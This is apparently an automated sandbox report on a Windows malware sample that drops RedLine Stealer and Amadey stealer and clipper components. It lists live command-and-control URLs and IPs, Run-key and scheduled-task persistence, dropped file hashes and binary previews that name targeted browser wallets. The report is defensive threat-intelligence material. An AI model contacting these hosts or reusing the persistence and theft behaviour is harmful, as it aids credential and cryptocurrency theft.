http://185.81.68.147/7vhfjke3/index.phpR0	Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.micro	explorer.exe, 00000004.00000000.2051826790.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3422880933.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3464363955.0000000008890000.00000002.00000001.00040000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/:hardwares.	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/D	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/06/addressingex	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.81.68.147	unknown	Finland		50108	KLNOPT-ASFI	true
185.81.68.148	unknown	Finland		50108	KLNOPT-ASFI	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1574171
Start date and time:	2024-12-13 01:36:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	44
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	yINR7uQlPr.exe renamed because original name is a hash value
Original Sample Name:	1bbc3bff13812c25d47cd84bca3da2dc.exe
Detection:	MAL
Classification:	mal100.phis.troj.spyw.evad.winEXE@76/87@0/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 71% Number of executed functions: 133 Number of non-executed functions: 302
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:37:00	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Services C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe
01:37:08	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Services C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe
01:37:26	Task Scheduler	Run new task: Gxtuum path: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
19:36:56	API Interceptor	5358x Sleep call for process: msiexec.exe modified
19:36:56	API Interceptor	5364x Sleep call for process: audiodg.exe modified
19:36:56	API Interceptor	332014x Sleep call for process: explorer.exe modified
19:37:27	API Interceptor	1853x Sleep call for process: Gxtuum.exe modified
19:37:33	API Interceptor	73x Sleep call for process: D7AB.tmp.ssg.exe modified
19:37:40	API Interceptor	47x Sleep call for process: powershell.exe modified
19:38:12	API Interceptor	2532x Sleep call for process: rundll32.exe modified
19:38:17	API Interceptor	39x Sleep call for process: ssg.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.81.68.147	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.147/tizhyf/gate.php?0CD020845398340779059
185.81.68.147	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar	Browse	185.81.68.147/tizhyf/gate.php?2DB3A69DE7692371543510

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
KLNOPT-ASFI	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.147
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar	Browse	185.81.68.147
	tjpq0h4wEH.exe	Get hash	malicious	RedLine	Browse	185.81.68.147
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	LxYpBRhMBx.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
KLNOPT-ASFI	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.147
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar	Browse	185.81.68.147
	tjpq0h4wEH.exe	Get hash	malicious	RedLine	Browse	185.81.68.147
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	LxYpBRhMBx.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115

Process:	C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3293
Entropy (8bit):	5.3364558769830905
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqc85Vsql:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qp
MD5:	1255FDF0A9A1C19092A78046C2B3B108
SHA1:	869678412F6D9879B84D57DCA18E46F986F173B5
SHA-256:	B6F9DDE82E514AB4C6A9DF4EB8A3EF7694C5A82D0CACE9FDA1318FD70359F58E
SHA-512:	55C29CAF8C13614F9E8EB5C7D9A2C1BCD180D6A7200693A74AFAFC7C092C7329865A10B82B46FE668B3FB13C43EDAEB60F0CBF64498BF984D4688CF9D5999AD9
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ssg.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3293
Entropy (8bit):	5.3364558769830905
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqcEsq35D:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qh
MD5:	CD2726EE4EEF3843D6673734B77A3E0A
SHA1:	AA537CC06CEF4CC75B6FF7CDC9B38F0660158717
SHA-256:	2C554F3CCAFF7C559620FAF795CCCE1A01CE92A914B3CDFBF12A98F8E88FAA40
SHA-512:	0ECCAAFB069D24EBC67C53E89821ED5F7FC32A752FAAF9FB4B2A99D2A6A480FF09C3B537AF01C6DCA31AD01C4143A074FDFB846BBE74D0F111F60DAB414780D5
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\update[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	308224
Entropy (8bit):	6.27479026130529
Encrypted:	false
SSDEEP:	6144:Y2J31coxDzgqSAy3/wLZRYa2dWSS8ySQIaTgHJ0tYRV4OeJiqbQ5rF4:71coxDzgxAKILIa2d1S8ySQIaTpjKrF4
MD5:	DD1E3F38AE7711D270748012AF613950
SHA1:	B3B90EEC3507F523AA63802CC16E5248C8EF0EA8
SHA-256:	2997292293C332E73B11FA28126B6FBEFEA75A6BB02001EB017DE46797D4E4EC
SHA-512:	0EFF0CBA972B6622FB59683FE4D15D1B6C1EF106166189F60DCD7B4C76B6CEB82FD5C71433DC61394F03EFF03575F2BE27DEC6AC8AB064491710263879B11BCA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a\.i%=.:%=.:%=.:,EJ:&=.:%=.:&=.:JKr:-=.:JKC:$=.:JKD:$=.:Rich%=.:................PE..d...<zZg.........."......:...*......\4.........@..........................................@.................................................@h..(.......(.......@....................................................................P.. ............................text....9.......:.................. ..`.rdata.......P.......>..............@..@.data........p......................@....pdata..@............X..............@..@.rsrc...(............\..............@..@.x64.....`.......T...`..................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.36076412023942
Encrypted:	false
SSDEEP:	3072:Vdu5ZXB8ZuzQT7SgmME8Yn/YoZ3SNqpidU1epf:WjGymSg7E8Y3Z3AdUwpf
MD5:	C2F3FBBBE6D5F48A71B6B168B1485866
SHA1:	1CD56CFC2DC07880B65BD8A1F5B7147633F5D553
SHA-256:	C7ED512058BC924045144DAA16701DA10F244AC12A5EA2DE901E59DCE6470839
SHA-512:	E211F18C2850987529336E0D20AA894533C1F6A8AE6745E320FD394A9481D3A956C719AC29627AFD783E36E5429C0325B98E60AEE2A830E75323C276C72F845A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........P...................................................................@......@......@.~.....@......Rich............................PE..L.....Zg...........!.....D..........bp.......`...............................0............@.....................................P.......................................8...............................@............`..L............................text....C.......D.................. ..`.rdata..*u...`...v...H..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ssg[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	307712
Entropy (8bit):	5.081279904923014
Encrypted:	false
SSDEEP:	3072:acZqf7D34kp/0+mA0kywMlQEg85fB1fA0PuTVAtkxzy3RMeqiOL2bBOA:acZqf7DIcnGCQNB1fA0GTV8kU0L
MD5:	7B6730CA4DA283A35C41B831B9567F15
SHA1:	92EF2FD33F713D72207209EC65F0DE6EEF395AF5
SHA-256:	94D7D12AE53CE97F38D8890383C2317CE03D45BD6ECAF0E0B9165C7066CD300C
SHA-512:	AE2D10F9895E5F2AF10B4FA87CDB7C930A531E910B55CD752B15DAC77A432CC28ECA6E5B32B95EEB21E238AAF2EB57E29474660CAE93E734D0B6543C1D462ACE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ssg[1].exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H(...............0.................. ... ....@.. ....................... ............@.................................<...O.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B................p.......H....... ...............(w..............................................a.u.t.o.f.i.l.l.5.t.Y.W.R.q.a.W.V.o.a.m.h.h.a.m.J.8.W.W.9.y.b.2.l.X.Y.W.x.s.Z.X.Q.K.a.W.J.u.Z.W.p.k.Z.m.p.t.b.W.t.w.Y.2.5.s.c.G.V.i.a.2.x.t.b.m.t.v.Z.W.9.p.a.G.9.m.Z.W.N.8.V.H.J.v.b.m.x.p.b.m.s.K.a.m.J.k.Y.W.9.j.b.m.V.p.a.W.l.u.b.W.p.i.a.m.x.n.Y.W.x.o.Y.2.V.s.Z.2.J.l.a.m.1.u.a.W.R.8.T.m.l.m.d.H.l.X.Y.W.x.s.Z.X.Q.K.b.m.t.i.a.W.h.m.Y.m.V.v.Z.2.F.l.Y.W.9.l.a.G.x.l.Z.m.5.r.b.2.R.i.Z.W.Z.n.c.G.d.r.b.m.5.8.T.W.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1281024
Entropy (8bit):	6.466046469058072
Encrypted:	false
SSDEEP:	24576:BO//kL3TtMhQsnoXyajMK8fCZEqcAxQBuLv8YPKpTG:z3pMhQzRM3MfcAxHv8t
MD5:	C6AABB27450F1A9939A417E86BF53217
SHA1:	B8EF3BB7575139FD6997379415D7119E452B5FC4
SHA-256:	B91A3743C7399AEE454491862E015EF6FC668A25D1AA2816E065A86A03F6BE35
SHA-512:	E5FE205CB0F419E0A320488D6FA4A70E5ED58F25B570B41412EBD4F32BBE504FF75ACB20BFEA22513102630CF653A41E5090051F20AF2ED3AADB53CE16A05944
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 34%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........D........................s.................................................X..........Rich...........................PE..d.....Zg.........." .........8...............................................P............`..........................................~..X....~....... .......`...............0..l.......p...........................p...8............................................text............................... ..`.rdata..............................@..@.data............D..................@....pdata.......`......................@..@_RDATA...............t..............@..@.rsrc........ .......v..............@..@.reloc..l....0.......x..............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1504
Entropy (8bit):	5.274324154700206
Encrypted:	false
SSDEEP:	24:39SKco4KmZjKbmuu1oas4RPT6moUP7m9qr9t7J0gt/NKmNUNEr8H0UMem:NSU4xymdax4RfoUP7m9qr9tK8NfUNEIa
MD5:	A7E7AD844BFE45249CF7E8E7CC935FDB
SHA1:	71DA3BE100BD6D8FE8FAF9689653127FE627A23B
SHA-256:	4A4D1A49C186310528A1275BF46FFFACC86206BCD5883BC232DD673D10617875
SHA-512:	92C4B83812F47E41A02D8F32AFF167DF166D6127705C365FC96A1FF7FFBA2877AF59C7376DE877B972AA10451BE677A556C25BC26F8CE6FA39CA1486AABD0B3B
Malicious:	false
Preview:	@...e...........4....................................@..........@...............\|.jdY\.H.s9.!..\|4.......System.IO.Compression...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

C:\Users\user\AppData\Local\Temp\10000820101\update.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	308224
Entropy (8bit):	6.27479026130529
Encrypted:	false
SSDEEP:	6144:Y2J31coxDzgqSAy3/wLZRYa2dWSS8ySQIaTgHJ0tYRV4OeJiqbQ5rF4:71coxDzgxAKILIa2d1S8ySQIaTpjKrF4
MD5:	DD1E3F38AE7711D270748012AF613950
SHA1:	B3B90EEC3507F523AA63802CC16E5248C8EF0EA8
SHA-256:	2997292293C332E73B11FA28126B6FBEFEA75A6BB02001EB017DE46797D4E4EC
SHA-512:	0EFF0CBA972B6622FB59683FE4D15D1B6C1EF106166189F60DCD7B4C76B6CEB82FD5C71433DC61394F03EFF03575F2BE27DEC6AC8AB064491710263879B11BCA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a\.i%=.:%=.:%=.:,EJ:&=.:%=.:&=.:JKr:-=.:JKC:$=.:JKD:$=.:Rich%=.:................PE..d...<zZg.........."......:...*......\4.........@..........................................@.................................................@h..(.......(.......@....................................................................P.. ............................text....9.......:.................. ..`.rdata.......P.......>..............@..@.data........p......................@....pdata..@............X..............@..@.rsrc...(............\..............@..@.x64.....`.......T...`..................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\10000830101\update.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	308224
Entropy (8bit):	6.27479026130529
Encrypted:	false
SSDEEP:	6144:Y2J31coxDzgqSAy3/wLZRYa2dWSS8ySQIaTgHJ0tYRV4OeJiqbQ5rF4:71coxDzgxAKILIa2d1S8ySQIaTpjKrF4
MD5:	DD1E3F38AE7711D270748012AF613950
SHA1:	B3B90EEC3507F523AA63802CC16E5248C8EF0EA8
SHA-256:	2997292293C332E73B11FA28126B6FBEFEA75A6BB02001EB017DE46797D4E4EC
SHA-512:	0EFF0CBA972B6622FB59683FE4D15D1B6C1EF106166189F60DCD7B4C76B6CEB82FD5C71433DC61394F03EFF03575F2BE27DEC6AC8AB064491710263879B11BCA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 58%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a\.i%=.:%=.:%=.:,EJ:&=.:%=.:&=.:JKr:-=.:JKC:$=.:JKD:$=.:Rich%=.:................PE..d...<zZg.........."......:...*......\4.........@..........................................@.................................................@h..(.......(.......@....................................................................P.. ............................text....9.......:.................. ..`.rdata.......P.......>..............@..@.data........p......................@....pdata..@............X..............@..@.rsrc...(............\..............@..@.x64.....`.......T...`..................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	307712
Entropy (8bit):	5.081279904923014
Encrypted:	false
SSDEEP:	3072:acZqf7D34kp/0+mA0kywMlQEg85fB1fA0PuTVAtkxzy3RMeqiOL2bBOA:acZqf7DIcnGCQNB1fA0GTV8kU0L
MD5:	7B6730CA4DA283A35C41B831B9567F15
SHA1:	92EF2FD33F713D72207209EC65F0DE6EEF395AF5
SHA-256:	94D7D12AE53CE97F38D8890383C2317CE03D45BD6ECAF0E0B9165C7066CD300C
SHA-512:	AE2D10F9895E5F2AF10B4FA87CDB7C930A531E910B55CD752B15DAC77A432CC28ECA6E5B32B95EEB21E238AAF2EB57E29474660CAE93E734D0B6543C1D462ACE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H(...............0.................. ... ....@.. ....................... ............@.................................<...O.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B................p.......H....... ...............(w..............................................a.u.t.o.f.i.l.l.5.t.Y.W.R.q.a.W.V.o.a.m.h.h.a.m.J.8.W.W.9.y.b.2.l.X.Y.W.x.s.Z.X.Q.K.a.W.J.u.Z.W.p.k.Z.m.p.t.b.W.t.w.Y.2.5.s.c.G.V.i.a.2.x.t.b.m.t.v.Z.W.9.p.a.G.9.m.Z.W.N.8.V.H.J.v.b.m.x.p.b.m.s.K.a.m.J.k.Y.W.9.j.b.m.V.p.a.W.l.u.b.W.p.i.a.m.x.n.Y.W.x.o.Y.2.V.s.Z.2.J.l.a.m.1.u.a.W.R.8.T.m.l.m.d.H.l.X.Y.W.x.s.Z.X.Q.K.b.m.t.i.a.W.h.m.Y.m.V.v.Z.2.F.l.Y.W.9.l.a.G.x.l.Z.m.5.r.b.2.R.i.Z.W.Z.n.c.G.d.r.b.m.5.8.T.W.

C:\Users\user\AppData\Local\Temp\246122658369

Download File

Process:	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	dropped
Size (bytes):	85870
Entropy (8bit):	7.847811038405675
Encrypted:	false
SSDEEP:	1536:CSTexaYplGx5EooYQD9pU/BKmzeneU6nxrT/1cjoxcAcqjx7YDDDVnSdlI:lT4/GzEoox9paw8ee1rT/1dcp05YDDDX
MD5:	1F92F5EAA16A16B7CF91A83F9692ECAD
SHA1:	71FEE9C94B83F9077B9F5031137F2C3AA14D485A
SHA-256:	248190CB1F3127B46160615E12251DA6682C756FF49B67F96C9187D94D101AEB
SHA-512:	254318B1CA2011DB0D28444B3239B6A424CF063CD6BED79E9493E46755C0B151945F42240EFAC93E19420E1BB51EC4D7753BF4EF551D0DC928107439839085D6
Malicious:	true
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3...m..,.X.c.#....O..i.....w...._.#.z..p.....MR...%.f..r.....Uf.....?.2......S.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..<.t..A...#'..N>.._.u.......^y.[......1..].+..B....%?........r.....{f`.'(Xw...&e.......Q...8X.V..._.^.(..(...&(....~....[.....).....+.F"8x{I.t.p....pj.g.Ez..+..........O.Wz.......\..4;?...O.........QA..Z.DqCr.Y...L....V..\A.

C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	4618
Entropy (8bit):	7.775906820090083
Encrypted:	false
SSDEEP:	96:k4hMhM7l2r1IcFRphmgkSWgkSyTd8TVPZp:k4x8FfR5kyJBp
MD5:	F726F7993ED6A4388F556FE537890026
SHA1:	3309C2968020050F4E7ACA960034CD8C82B09C4B
SHA-256:	99F5EFCE6E16A2E7DB09283487F0C85F5F803D46D94C642E99FE7F49C239F4A9
SHA-512:	F71DF19FA831858C227A7D8A1E27F274D91C08B6D473C4B0D2B64FABB0600E77430C6539A0CC71800854A02E4488BAF3746F61F9C77CAE86E606A2DDEAB78119
Malicious:	true
